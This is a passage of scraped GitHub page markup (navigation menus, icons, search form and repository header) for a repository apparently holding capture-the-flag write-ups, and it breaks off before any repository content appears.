h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="369551288" data-scoped-search-url="/ArjunaAcchaDipa/CTF-writeups/search" data-owner-scoped-search-url="/users/ArjunaAcchaDipa/search" data-unscoped-search-url="/search" data-turbo="false" action="/ArjunaAcchaDipa/CTF-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="mEmkVPwZFCKSkBvlzxCra8fKhUfCsvr5334ol61mX+RodXfLkn/NcCFabJijTKwyTK/+Md0trSN4Xc3z+yboDw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> ArjunaAcchaDipa </span> <span>/</span> CTF-writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>1</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 